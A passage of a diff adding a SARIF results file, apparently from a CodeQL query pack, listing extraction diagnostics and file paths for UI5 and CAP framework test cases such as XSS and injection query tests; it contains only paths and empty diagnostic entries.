: { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 362 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 364 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 365 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 366 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 368 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 369 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 370 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 372 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 373 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 374 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 376 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 377 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 378 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 380 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 381 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 383 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 384 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 385 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 386 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 390 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 391 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 392 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 394 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 395 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 397 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 400 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 401 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 410 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 412 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 413 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 414 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "scripts/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 415 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "scripts/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 416 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + } ], + "executionSuccessful" : true + } ], + "artifacts" : [ { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + } + }, { + "location" : { + "uri" : 
".github/actions/install-codeql/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 5 + } + }, { + "location" : { + "uri" : ".github/actions/install-qlt/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 6 + } + }, { + "location" : { + "uri" : ".github/codeql/codeql-config.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 7 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 8 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 9 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 10 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 11 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 12 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 13 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 14 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 15 + } + }, { + "location" : { + "uri" : ".github/workflows/code_scanning.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 16 + } + }, { + "location" : { + "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 17 + } + }, { + "location" : { + "uri" : "codeql-workspace.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 18 
